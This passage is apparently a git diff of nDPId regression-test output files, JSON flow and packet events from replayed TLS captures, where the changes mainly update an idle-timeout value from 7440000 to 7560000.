+00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-data-len":895,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1391444859282} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 diff --git a/test/results/tls_esni_sni_both.pcap.out b/test/results/tls_esni_sni_both.pcap.out index b704714a9..34c2be846 100644 --- a/test/results/tls_esni_sni_both.pcap.out +++ b/test/results/tls_esni_sni_both.pcap.out 
@@ -1,19 +1,19 @@ 00468{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1595697574192} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697574192,"flow_last_seen":1595697574192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697574192,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"} 
-01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} -01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": 
{"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} 
-01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI 
Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697574192,"flow_last_seen":1595697574192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697574192,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595697574192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697574192,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjMAbsVnUj1AAAAALAC\/\/+ITAAAAgQFtAEDAwYBAQgKRX5W8wAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595697574222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697574222,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72MxjNlEZFZ1I9oAS\/\/+oqwAAAgQFeAEBBAIBAwMK"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595697574222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697574222,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjMAbsVnUj2YzZRGlAQEADZRAAA"} 
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697574192,"flow_last_seen":1595697574223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":634,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1595697574223,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} +01204{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697574192,"flow_last_seen":1595697574271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2094,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697574271,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": 
{"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"these-are-not-the-droids-youre-looking-for.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595697597731,"flow_last_seen":1595697597731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1595697597731,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1595697597731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1595697597731,"pkt":"LLBdqyO5+P\/CRWqLCABFAABAAABAAEAGYZTAqAEVaBGvVdjaAbvycO9jAAAAALAC\/\/+plAAAAgQFtAEDAwYBAQgKRX6yWgAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1595697597760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1595697597760,"pkt":"+P\/CRWqLLLBdqyO5CABFAAA0AABAADkGaKBoEa9VwKgBFQG72Npkmiax8nDvZIAS\/\/9OXwAAAgQFeAEBBAIBAwMK"} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}} 
+01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI 
Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":13775,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1595697597855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 diff --git a/test/results/tls_invalid_reads.pcap.out b/test/results/tls_invalid_reads.pcap.out index 0c5b52f86..abe25bf1c 100644 --- a/test/results/tls_invalid_reads.pcap.out 
+++ b/test/results/tls_invalid_reads.pcap.out 
